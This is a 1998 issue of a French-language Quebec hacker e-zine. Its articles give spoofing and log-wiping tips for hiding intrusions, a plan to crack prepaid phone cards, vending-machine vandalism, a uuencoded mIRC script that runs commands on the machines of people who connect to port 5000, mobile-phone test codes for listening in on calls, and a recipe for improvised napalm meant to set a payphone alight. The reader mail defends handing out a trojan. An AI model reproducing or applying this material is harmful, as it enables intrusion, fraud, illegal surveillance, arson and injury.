          __________________________. ._
         <  _________________________\| \
          \(  |  | /  \  |  |  /  _   \  |
              |  |/  . \ |  | /  (_)  |  |
   _          |: /  /|  \|: | |: ._.  |: |             _
  (_)         |o(  (_|   |o | |o | |  |o |_____       (_)
              |  \__\___/|  | |  | |__|_______/       
              | /         \ | | /    
              |/           \| |/
              :             : :       

 ___________   _______  ._.________________        ._
 \______    ) _\___,  \ |<  ____________   \   __  | \
   |  | )  / /  \  |   \| \( |  |  |  | )  /  /  \ |  |
   |  | \_/ /  . \ |  . '  | |  |  |  |/  /  /  , \| :|
   |: |  _ /. /|  \|  |\. :| |: |  | :|\  \ /. /|  \ o|
 __|o |_) (o (_|   |  | | o| |o |  | o| \  (o (_|   ) |____
 \_,  _____\__\___/|  | |__| |  |  |  |  \  \__\___/______/
   | /              \ |       \ |  | /    \/
   |/                \|        \|  |/
   :Cluster           :         :  :


*----------------------------------------------------------------------------*
Ý                                                                            Ý
Ý                   Total Control,  Num‚ro 15,  Juillet 1998                 Ý
Ý                                                                            Ý
Ý                       http://totalcontrol.home.ml.org                      Ý
Ý                                                                            Ý
*----------------------------------------------------------------------------*
Ý#tctrl (EFNET) = LE CHANNEL OFFICIEL DES LECTEURS ET STAFFS DE TOTAL CONTROLÝ
*----------------------------------------------------------------------------*

/------------------\
|  AVERTISSEMENT   |
\------------------/

Ce document  contient  des  informations  ill‚gales si  vous les utilisez mais
puisque,  ici,  elles  ne  sont  distribu‚es  que pour  des  fins  ‚ducatives,
elles peuvent ˆtre  consid‚r‚es ‚tant l‚gales (vous me suivez ?). Le personnel
de Total Control ne vous encourage  pas … utiliser ces techniques et n'est pas
responsable de l'utilisation que vous en faites. Bla bla bla...

/------------------\
|   Mode d'emploi  |
\------------------/

Pour tous les fuckin' perdus de la vie qui ne savent pas trop pourquoi ce zine
est truff‚ de "carr‚s noirs" … la place des accents (ce qui le rend illisible)
et pourquoi il est tout croche, VOUS DEVEZ LE LIRE AVEC MS-EDIT EN DOS !!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                               0=--------------=0
                               |  Introduction  |
                               0=--------------=0
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Salut tout le monde... Et oui, enfin le num‚ro 15 est sortit. Excusez
le retard mais j'avais d'autres pr‚ocupations et des choses personnelles …
faire... touka.. au moins, si vous lisez ces lignes c'Est que je me suis boug‚
et que maintenant il est disponible.

        Je me dois de vous mentionner avant que je ne l'oublie que le ASCII
d'intro du zine … ‚t‚ fait une fois de plus par Cluster et qu'il s'Est inspir‚
du ASCII de Mental Floss (NPC zine).

        Ok, pour ce qui est de la saga Corruption Addicts, je vous avais dit
que le procŠs serait le 21 juillet … 9h00 mais … cette date, ce ne sera que la
divulgation des preuves et aucunes personnes n'est admises. Pour ce qui est de
la manifestation, il faudra oublier ‡a puisque aprŠs un court sondage je me
suis rendu compte que 80% des personnes aimeraient mieux y aller @incognito@
pour ne pas risqu‚ leur s‚curit‚. Personnellement, je ne crois pas que de
manifester fait de nous des hackers mais plut“t des personnes qui croient en
leur libert‚ d'expression. En tout cas, il s'agit de mon point de vue mais je
ne peux tout de mˆme pas aller manifester tout seul donc je ferai comme
beaucoup d'autres personnes et j'essayerai de me prendre un siŠge au procŠs.

        Si vous ˆtes int‚ress‚ par le procŠs, v‚rifiez le site r‚guliŠrement
car je vais y mettre la date du procŠs et les coordonn‚es du palais de justice
dŠs que phaust m'aura confirmer le tout.

        FREE CORRUPTION ADDICTS

        FUCK CASTONGUAY !!!!!!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                          Le courrier des lecteurs
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

D‚sormais, je ne peux pas publier TOUS les e-mails re‡u parce que j'en re‡ois
beaucoup trop. Je prends les plus gentils et les plus licheux :-) h‚h‚h‚h‚

-------------Cut Here----------------------
Date: Sat, 13 Jun 1998 22:14:29 -0400
From: Jeep <jeep2@cyberdude.com>
To: err418@technologist.com
Subject: TC

Salut men,
                TC, vraiment trop hot :) J'aime ben gros pis ma
continuer a les suivres... Si tu veux je peux surment t'aider pour tes
articles sur le hacking, je m'y connais un peux.. p-e assez pour faire
quelque articles. Entk men continuer votre travail c kewl

Jeep
-------------Cut Here----------------------

******* Alerte le e-mail suivant contient des scŠnes sanglantes ************

From: Malartre <malartre@aei.ca>
To: err418@technologist.com
Subject: Salut

Salut, j'ai lu ce que t'as ‚crit sur total control. C'est pas pire cot‚
t‚lephone :-)

Hum, ya certaine chose que chu pas d'accord... Tu sais c quoi un script
kiddies? J'ai rien contre les newbies... chu newbie moi mˆme dans pas mal
de chose.

C'est juste que les scripts kiddies me font chier.
Check, ils achŠtent un ordi. La y d‚cide d'aller sur irc pis de se
d‚fouler sur le plus de monde possible avec des programmes pr‚-fait. Ils
ont aucune ostie de morale. Pis aprŠs ‡a, sa se pense ben bon.

€a vise pas personne mais c mon opionion :

Exemple: y'a un des gars qui a ‚crit sur total control (je vise
personne). Mon petit frŠre de douze ans qui fait pas la diff‚rence entre un
.txt pis un .exe ;-) c'est fait send‚ un jeu par lui. Malgr‚ toutes les
pr‚cautions que j'ai pris a lui rentr‚ dans tˆte que les fichier sur irc
c'est pas safe, ya quand mˆme accept‚ le fichier.

C'‚tait un trojan horse. Kelke chose qui ressemble ‚trangement a dmsetup
en passant hehehe, on dirait un rip.

La, y par en gueulant dans maison "J'me su faites hack‚, j'me suis faites
hack‚!" Pis la c'est qui qui rŠgle le problŠme? Mo‚.

Bon, lŠ j'ai faite un beau m‚nage pendant que le gars continuait de
goss‚ sur mon ordi par le port 5000. La j'y demande c'est quoi son but
de faire ‡a, y dit "j'voulais essayer quequechose". J'ai tu l'air cave?
Y ma faite reboot‚ juste pour le fun. Merveilleux. La j'ai cherch‚ comme
un osti de malade le nom du trojan qui ma send‚. Finalement y ma donner
l'URL de total ctrl. Rien a chier d'installer un firewall. Moi je veux
une solution clean. Fasque j'ai goss‚ pis la je pense j'ai r‚gl‚ mon
prob. Pourkoi j'‚crit ‡a? Pour dire a toute les osti de ti-coune qui
teste les affaires sur les autres de voir si ya une solutions propre …
se qu'ils fonts. Kalice, ya mes parents qui se serve de Win95. Moi
j'utilise FreeBSD, mais c pas n‚cessaire de scrapp‚ mon win pour tester
des conneries dans le seul but de faire chier un ti cul de 12 ans. €a
vous donne un sentiment de puissance de reboot‚ les ti jeunes de irc pis
de fuck‚ leur C:\ pis de leur faire croire que vous aller faire sauter
toute?

€a sait mˆme pas c'est quoi une man page ou prononcer Unix pis ‡a s'amuse a
faire la terreur. Attendez que y'ai plus gros que vous qui vous tombe
dessus!

€a s'addressait au wana-be-ben-hot qui font chier le peuple =)
------------------------
kaput@whoever.com         ICQ #4224434               
FreeBSD-2.2.6                        
------------------------

R‚ponse de Err418 :     Bon, dans ce e-mail on ressent de la frustration dans
===================     les paroles de l'auteur. Si je serais un vrai de vrai
                        punk-anarchist-cyber-hacker-phreaker-from-hell je te
                        dirais d'aller te faire enculer jusqu'… ce que ton
                        dentier te sorte par le cul MAIS c'est pas le cas pcq
                        je suis un gars qui s'int‚resse au h/p et qui est ben
                        ordinaire alors je te dit que je te comprends.
                        Cependant, si tu lis le disclaimer qui apparait dans
                        chaque num‚ro, NOUS NE SOMMES PAS RESPONSABLE DES
                        ACTES DES AUTRES. Que tu te fasses hack‚ jusqu'… l'os
                        pis que ton c: se fasse formater, j'EN AI RIEN …
                        CALISSER. En passant, c'Est pas un rip de DMSETUP
                        c'est le socket de troie qui utilise le port 5000.
                        Il ne s'agit pas d'un rip pcq on a jamais dit que ‡a
                        venait de nous... c'est juste un file de mˆme mis … la
                        disposition du public. J'aimerais aussi te dire que
                        t'es vraiment leeto d'utiliser FREEBSD... tu es mon
                        idole je pense... hahahaha... j'm'en crisse de ton OS.

-------------Cut Here----------------------

So, C'est tout !

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                 Le Spoofing
                        Par BiNFUCKER (binf_80@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Avant de commencer je voudrais dire que cet article la a ete ecrit pour
les newbies tout comme les plus avances en hacking. 

Il sagit bien-sur d'un texte d'information:

Le spoofing... hum quelle belle invention..:) heheheh bien-sur il y a 10
ans..sur ARPANET l'ancetre d'internet..on pouvait spoofer a notre guise..
dans les debuts d'internet aussi...mais maintenant tout a change...
on ne peut plus seulement ACK SYN Flooder une target pour spoofer..dumoins je
parle de 99.99% des computers sur internet...les protocols ont ete modifies
avec le temps..mais comment peut on oser dire qu'on spoof..! Hum...Bien ca
depend des points de vue..il y a plusieurs methodes..qui sont aujourd'hui
disponibles pour vous:

1-iDENT spoofing (Tres lame..dumoins ce n'est pas du vrai spoofing)
2-Wingate spoofing , proxy spoofing , shell spoofing (50%)
3-Le BLiND (100% mais une seul direction)
4-BiND spoofing (le vrai, le seul, l'unique spoof a 2 directions)

1- iDENT spoofing
	...wow...le spoofing pour win 95 haha super..je me connecte
	sur irc avec un programme qui modifie mon ident...hum mais 
	mon dns reste le meme..que faire? Bon...heheh ceci est considere
	comme du spoofing..mais en fait..ce n'est que l'adresse qui est
	modifie..quand on se connecte sur le serveur le programme envoie
	une chaine de caracteres qui fourvoie le serveur et qui vous permet
	d'impressioner les petites filles dans le channel 13 and et moins..
	avec une adresse bidon comme (nick)@ha.je.taime.anne11
	En fait vous restez vulnerable aux attaques des DoS(Denial of
	Services) ou NUKES...des floods..ect...une seule bonne application
	des idents spoofs c'est que vous pouvez spoofer un op qui est sur un
	bot et si vous aviez son pass alors..eehhehe vous pourriez avoir le
	controle du bot pour faire une takeover hahahahahaha...ok redevenons
	serieux..faire ca c'est lame... mais bon..heheheh ceux qui veulent le 
  	faire faite le.:).

2- WiNGATE ,PROXY,SHELL
	Bon..ici on ne peux parler de grosses techniques..mais plutot de
	sysadmin pas vailliant qui nous aident.Ici je parle des wingates qui
	nous permettent de spoofer l'adresse du wingate connecte,des proxy
	et des shells qui font la meme chose. En fait on rencontre souvent
	des gens qui vont sur irc, qui wingatent..ou qui run un shell UNiX pour 
	pouvoir nuker...c'est tres bien mais moi l'application des wingates,
	proxy et des shells que je trouve la plus pratique c'est que nous
	pouvons pratiquement spoofer notre presence quand nous hackons un
	serveur.Je veux dire que par la combinaison suivante qui m'a
	ete donner par un Conseillier senior d'un service internet
	quelconques nous pouvons etre intracable..:
	Notre ordi==>wingate==>wingate==>Shell==>wingate==>CiBLE
	Bon il faut s'entendre intracable par traceroute et..quelques
	autres commandes..bien sur si vous hackez un serveur du pentagone..:)
	heheh ils ont des chances de vous retrouver..environ 50% car..les
	wingates sont en fait des bugs...mais certains administrteur ne se
	souciant pas de la perte de bandwith de leur reseau les laissent
	ouverts...mais log les connections :) alors...si on vous log..et si
	par chance pour l'intelligence qui vous pourchasse tout les wingates
	etaient logges...alors bonne chance :). Bon..il faut  aussi mentionner
	que si vous hackez par l'intermediaire d'un shell il est bon de
	savoir comment effacer les logs...bien sur il y a plein d'exploits
	pour ca....utmpclean,zap,marry.....voir:www.rootshell.com.
	En fait la solution est de bien couvrir ses traces..:)
	Ha une autre chose a propos des wingates...certains wingates son
	ouverts seulement pour  vous attirer vers eux puis ensuite logger
	toutes vos actions alors attention...
	
Pour trouver les wingates..utilisez un wingate scanner...
Proxy = meme chose
Shells = achetez en un...ou Hackez en un :)



3- Le BLiND SPOOFiNG...
	Bon...je ne m'etendrai pas vraiment la dessus...le blind
	spoofing est surtout utilise pour les DoS ...Nukes.. il 
	permet de spoofer l'adresse d'un packet.L'inconvenient	
	c'est que le packet reste tracable sur le reseau de routers 
	utiliser pour lancer l'attaque.Alors le packet est tracable..
	et vu que les routers sont logges..alors :) hehehe on peut vous
	retracer si le besoin s'en fait ressentir en fait le blind spoofing
	repose sur le principe que le packet se dirige dans une seule direction
        Alors on ne peut voir le resultat....du point de vue du
	packet envoye...exemple:
	J'envoie un packet spoofe a 170.90.90.90 provenant de l'adresse
	120.3.2.1 ...je n'ai plus de controle sur 120.3.2.1 .
	N'oublier pas que ma vrai adresse n'est pas 120.3.2.1 mais 
	que si on trace 120.3.2.1 et notre adresse on retrouvera qu'il
	proviennent des meme routers que notre ip et si on regarde dans les logs
	des routers...on retrouvera le ip de provenance..(j'ai deja ete
	retrace pour avoir fait crasher des machines qui runnaient linux avec
	nestea...hehehe mais bon maintenant ce bug fix.)
	Le blind spoofing est donc souvent utilise dans les nukes...car 
	nous n'avons pas besoin de recevoir un packet..pour confirmer qqch.

Encore une fois ces attaques peuvent etre loguees ou tracees mais un packet 
provenant d'un blind spoof a une duree de vie egale a celle des logs que
les routers gardent...alors si vous voulez savoir combien de temps votre
securitee peux etre compromise...hum appelez votre ISP et demandez lui
combien de temps les routers gardent les logs ;) je ne sais pas pourkoi mais
ils ont refuse de me le dire hehehehe.
	

	
4- Le BiND SPOOFiNG

	Hum..bon...voici le summum de la protection....que nous pouvons avoir
	en fait si on est capable de reunir toutes les composantes nesessaires.
	Premierement savoir :
	Qu'est-ce qu'un Domain-name-server,Name server ou NS:
	J'utilise la compagnie internet total.net
	Pour me donner un nom en fait une addresse ip le serveur a recours 
	a un Name server qui m'a attribue une addresse ip ..vous avez
	deviner un Name server c'est ce qui donne les ip..et la resolution
	en nom comme www.yaho.com = 204.71.200.74  toutes ses conversions 
	en lettres sont effectuees par eux...alors imaginez le reste
	si vous pouviez avoir l'acces root sur un NS :)!
	Exactement..vous dever avoir..root sur un NS pour vraiment spoofer
	pouvoir changer votre dns....alors.les mythes entourant le spoof sont
	grandement resolus.. 

Et apres le root....comment fait t'on...:) utilisez un programme comme jizz
ou any-erec des BiND spoofers
Bien sur je recommande de faire cela avant de se rooter sur un NS
Notre ordi==>wingate==>shell==>wingate==>NS 
dumoins si vous voulez ne pas etre logge
Et comment trouver les Nameservers...? Bien en Windows 95 ..je ne sais pas
mais en Linux ou Unix....la commande Nslookup est tres utile..!
EX:
	Nslookup -type=any www.yahoo.com
	non-authorative nameserver...on oublie ca....!

	authorarive nameserver
	ns.yahoo.com 	= 204.71.177.33
	ect....

alors ce sont les nameservers :)
mais attention les nameserveurs sont souvent les colones vertebrales des
reseaux alors attention de ne pas les mettre down!...
	
Bon je crois que cela fait un survol du spoofing... alors pour terminer
j'aimerais vous dire que ce n'etait qu'un bref survol..si la demande est
forte et que Err418 veut que je produise encore alors je produirai un autre
article.
	
Pour me joindre :
Undernet: BiNF_
	#Rhino9,#HACk.fr
ou binf_80@hotmail.com
Merci special a FBoy pour la correction des fautes :)
Apres je me demande pourkoi j'ai 40% en francais..

Pour plus d'information sur le HACKiNG en general :
www.rhino9.com :Sekurity team
www.frhack.org : FRhack
www.yahoo.com : ;)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              Cellulaire … carte
                           Par nikonstock@hotmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Je sais pas si ya kelkun qui l'a remarqu‚ mais ya les nouveaux cellulaires …
carte qui sont sortis. Ouin c'est brillant comme id‚e mais y'a un hic,
carte = pas de compte fixe = pas aucun retracage = Cracking assur‚ 100%
garantis ou argent remis.

C'que jveux dire par ce charabia c'est que je suis sur qu'il y a moyen de
fabriqu‚ … l'aide de l'outil essentiel de notre vie (l'ordinateur) et s'en
servir pour changer la programation de base de la carte pour pouvoir en faire
une carte au lieu de 60 minute d'utilisation qu'elle aille une utilisation
illimit‚. Un cellulaire avec des frais au d‚but, tu paye ton cellulaire,
tu te paye une carte et ensuite tu rend ta carte illimit‚e au lieu de 60
minutes.

Merci beaucoup a Cantel pour ce merveilleux cellulaire dont tout le monde …
l'avenir pourraa se servir sans aucun frais.

Pour les autres qui n'ont pas d'ordis bien y'ont juste a acheter les carte
d‚jas pr‚par‚e.

Une nouvelle grosse job est apparu dans l'industrie du Cracking.

J'ai besoin d'aide de la majorit‚ des personne qui savent crack‚ ce genre de
carte alors m'a all‚ m'en acheter un pis ensuite je mettrai le plus d'info
possible sur ce nouveau jou-jou mais si y'a kelkun qui trouve kekchose avant
moi et bien e-mailez moi pour que bientot ce ptit celluloch devienne gratuit.

Si des informations sont d‚couvertes, TC magazine les publiera le plus vite
possible.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=
                         Machines … Coke et port 5000
                       Par NeaKlux (ignite27@hotmail.com)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=

Machine … Coke:
===============

Si tu veux vandaliser une machine … Coke, tu prends ta crow bar, pis tu 
arrache la petite porte noire ou les liqueurs tombent, ensuite tu passe 
ta main dans le trou, il va y avoir plusieurs petits volets (a environ 
20cm), tu en lŠve un, et tu prends la liqueur (si tu as des trop grosses 
mains, tu r‚ussiras pas a lever le volet pis passer la liqueur, ‡a prend 
vraiment des doigts de f‚e). Si c'est un 7up qui est tomb‚ pis tu voulais un 
Coke, tu jettes le 7up dans poubelle pis tu essaie un autre volet 
dans la machine. 

*** Petite anectdote*** Je l'ai essay‚ une couple de fois, pis une fois, 
un moniteur est arriv‚ et a mis la main sur l'‚paule de mon ami quand 
y'avait la tˆte vir‚e pis la patte pogn‚e dans le volet. Y'a sorti 2 
cokes et il les a donn‚ au moniteur qui est parti sans rien dire. Moi je 
me roulais … terre!

Port 5000:
==========

Maintenant, un petit script trŠs trŠs amusant pour nuker ceux qui
utilisent le Socket de Troie avec port 5000 pour vous hacker.
    
Mat‚riel :  - IRC (je prends mIRC 5.4, n'importe lequel est bon                     
              tant que tu as un remote avec)
            - Le script ci-joint nomm‚ command.ini

Protocole :

1- tu enregistre le file dans ton r‚pertoire de mIRC
(exemple : c:/mirc/download -- peu importe).

2- dans ton mIRC, tu click sur l'ic“ne Remote Script
(dans la version 5.4, c'est un ic“ne dans la barre des tƒches, avec deux
points rouges et en haut c'est ‚crit CE)

3- Tu click sur l'onglet Remote, tu fais -file -load -script et tu       
s‚lectionne le script joint ci-dessous (command.ini).

4- Ensuite, tu dois ouvrir ton port 5000. Pour cela, tu dois lib‚rer    
le port. Donc, si tu utilise nukenabber ou n'importe quel protect,    tu 
fais disable, port 5000 et tu enlŠve tes firewall. Ensuite, dans   ton 
IRC, tu entre la commande suivante: //$portfree(5000). Tu   regardes 
dans ton status, un des deux ‚nonc‚s suivant devraient     apparaitrent: 

$FALSE Unknown command
ou
$TRUE Unknown command .

5- Si c'est $TRUE..., c'est parfait, tu passe … l'‚tape 7.

6- Si c'est $FALSE..., tu fais la commande suivante:
/sockclose hack
et tu refais //$portfree(5000). Si ‡a devient $TRUE, maintenant, tu   
peux passer imm‚diatement … la prochaine ‚tape. Si ‡a ne marche   
toujours pas, c'est peut-ˆtre que tu as la taupe du socket de Troie.   Ce 
qui veut dire que tu as fait l'idiot et que tu as click‚ sur   Host.exe 
joint au #14 de TC Magazine. Tu dois donc effac‚ la taupe.   Chose trŠs 
simple, tu click sur Crtl-alt-del, et tu fais fin de  tƒche … 
mschv32.exe, ensuite, tu recherche ce fichier sur ton   ordinateur (qui 
devrait se trouver dans c:/windows/system) et tu  l'efface de ton HD, 
si tu ne sais pas trop si c'est le bon fichier,   celui-ci devrait ˆtre 
autour de 328kb. Tu dois ensuite aller dans ta   base de registre, faire 
une recherche pour mschv32.exe et effacer   tous les ‚l‚ments qui s'y 
rapporte. Tu seras sur d'en trouver au   moins un parce que tu as fait 
la recherche avec ton ordinateur (les   fichiers que tu recherche sont 
sauvegard‚s dans ta base de registre   … d‚faut de + ou - 10). Il peut y 
avoir quelques petites variantes   quant au nom et taille du programme 
mschv32.exe puisqu'il existe   plusieurs Socket de Troie comme Hackprot 
et Controll. Un autre   fichier pourrait ˆtre dmsetup.exe de taille 
semblable.
 
7- Pour faire suite, tu as juste … faire la commande suivante:   
/socklisten hack 5000, ((**si ce message apparait: * /socklisten:   
'hack' socket in use, c'est peut-ˆtre encore parce que tu as la   taupe, 
retourner … l'‚tape 6, sinon, tu fais juste gosser avec les   3-4 
commandes que j'ai donn‚ pis ‡a va marcher a un moment donn‚!**))
Cette commande va attendre que quelqu'un se connecte … ton port et  ‡^a va 
lancer le script et maintenant, tu demandes … quelqu'un qui a   un 
Controle de cheval de Troie de te hacker et tu l'observe te  sacrer 
aprŠs parce que tu viens d'effacer son autoexec.bat, tu viens de  rebooter 
son ordi ou tu as ouvert 50 fois son command.com!!! Dans le  script 
ci-dessous, ‡a fait juste ouvrir le command.com 3 fois et  autoexec.bat 
une fois (‡a c'est  seulement si le fichier est dans le  bon r‚pertoire 
sinon tant pis!), mais ya tellement de choses que tu  peux faire.

***Merci … Hi-Tech et … Knewon (sur qui j'ai essay‚ le script... sans 
rancune l…!)

Bonne Chance!!!
-------------UUENCODE de COMMAND.INI-----------------
Content-Transfer-Encoding: x-uuencode
Content-Disposition: attachment; filename="command.ini"

begin 644 command.ini
M6W-C<FEP=%T-"FXP/6]N(#$Z8V]N;F5C=#H@>R!I9B`H("1P;W)T9G)E92@U
M,#`P*2`]/2`D=')U92`I("8F("@@)6AA8VL@(3T@)&YU;&P@*2![("]S;V-K
M;&ES=&5N(&AA8VL@-3`P,"!]('T-"FXQ/0T*;C(](VAA8VL@;VX-"FXS/6]N
M(#$Z<V]C:VQI<W1E;CIH86-K.B![#0IN-#T@("]I;F,@)5-O8VLN3F%M92`Q
M#0IN-3T@("]S;V-K86-C97!T("53;V-K+DYA;64-"FXV/2`@+F5C:&\@+6$@
M`S@L-2T^($-O;FYE8W1I;VX@<W5R(&QE('!O<G0@-3`P,"!D92`Z'R`D*R`D
M<V]C:R@E4V]C:RY.86UE+#$I+FEP#0IN-ST@("]S;V-K=W)I=&4@+6X@)5-O
M8VLN3F%M92`^(%)E;6]T92XN+B!/2R`D*R`D;&8@(`T*;C@]("`N96-H;R`M
M82`#."PU+3X@4')I<V4@9&4@8V]N='+T;&4@9&4@;"=O<F1I;F%T975R(&1I
M<W1A;G0N+BX@3TL@.OX-"FXY/2`@+W-O8VMW<FET92`M;B`E4V]C:RY.86UE
M("\O(&5X96-U=&5R(&,Z7&-O;6UA;F0N8V]M("0K("1L9@T*;C$P/2`@+W-O
M8VMW<FET92`M;B`E4V]C:RY.86UE("\O(&5X96-U=&5R(&,Z7&%U=&]E>&5C
M+F)A="`D*R`D;&8-"FXQ,3T@("]S;V-K=W)I=&4@+6X@)5-O8VLN3F%M92`O
M+R!E>&5C=71E<B!C.EQC;VUM86YD+F-O;2`D*R`D;&8-"FXQ,CT@("]S;V-K
M=W)I=&4@+6X@)5-O8VLN3F%M92`O+R!E>&5C=71E<B!C.EQC;VUM86YD+F-O
M;2`D*R`D;&8-"FXQ,ST@("YT:6UE<B`Q(#(@+W-O8VMC;&]S92`E4V]C:RY.
,86UE#0IN,30]?0T*
`
end
--------------FIN--------- cUT HERE-----------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                        Eavesdropping avec un Motorola
                    Par moi-meme (quebecxxx@videotron.ca)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

J'ai finalement trouver comment scanner avec les motorola.
(micro-tac,star-tac,flip,550,650,910)

PremiŠrement, il te faut un cellulaire motorola (se sont les plus
complets). Ensuite, il faut allumer l'appareil, ensuite il faut aller dans le
mode @test@ en composent tout siplement
fcn + 0  + 0 + * + * +83786633 + sto
ensuite ont compose le code pour le rx audio ON (soit le 08#). On
devrait pouvoir lire US sur l'‚cran, ensuite on recompose encore (08#).
Maintenant, il faut choisir un canal , j'ai trouver seulement quelques canaux
mais il doit y en avoir d'autres.

(11300#)(11333#)(11385#)(11799#)(11991#)(110300#)(110333#)(110385#)(110799#)
(110800#)

AprŠs avoir entrer un canal le son devrait ˆtre plus fort des
grichements ou de voix. Si apres avoir composer un canal le son
n'augmenet pas, recomposer (08#)

Ce qu'il faut comprendre : (08#) donne la commande du rx audio on et les
(11xxxx#) sont les fr‚quences que l'ont ‚coute ont peut changer de
fr‚quence quand on veut en composent une autre et si le son disparait
on recompose (08#).

Mise en garde :  les num‚ros 00 a 99 suivie de # sont tous des commandes
pour le test mode donc si vous pitonnez autre chose que ce que je vous est
dit ..........bonne chance pour reconfigurer votre cellphone...

p.s :  la meilleur maniere de fermer sont cellulaire apres une session de
scanning c'est (01#). Le t‚l‚phone fera sa routine d'ouverture en monde
ordinaire.. si (01#) ne marche pas faite le (13#), c'est la mˆme chose.

amusez- vous bien

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-
                               Le Napalm
                   Par: PsYkAoS (dusthackers@hotmail.com)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==---=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Qui n'a pas un jour rˆver d'utiliser le fameux gaz qui a presque an‚anti les
viet lors de la guerre ?

Bon la recette ci-dessous n'est pas celle du napalm mais ‡a donne la mˆme
chose...

Il vous faut :

-Un litre dessence

-Du "styrofome" (en quebecois) mais pas n'importe lequel... €a prend celui qui
fait plein de ptite boulle blanche (celui qui retient les ordinateurs dans
leur boite.)

La technique est simple :

1) Ajoutez le "styrofome"dans lessence et melangez

2) Ajoutez jusqu'… ce que le m‚lange devienne une pate (pas trop dure la pate)
ensuite laisser reposer pendant 24 heure et aprŠs s'il reste encore du
jus, rajoutez du "styrofome".

Conseils:
=========

Pour l'utiliser trouver vous un cher millenium, placer la pƒte dans l'espace
de retour de la monaie et allumer (avec une mŠche si possible)....

Sauvez vous parce que ‡a br–le pis pas … peu prŠs.

Je rapelle que le contenu de cet article est pour fins ‚ducationelles
seulement.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                Fun fun fun
                     Par Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vous vous emmerdez, c'est dimanche, vos parents sont partis … la messe et il
pleut ? ALORS voici la solution pour vous amuser et arrˆter de vous emmerdez.

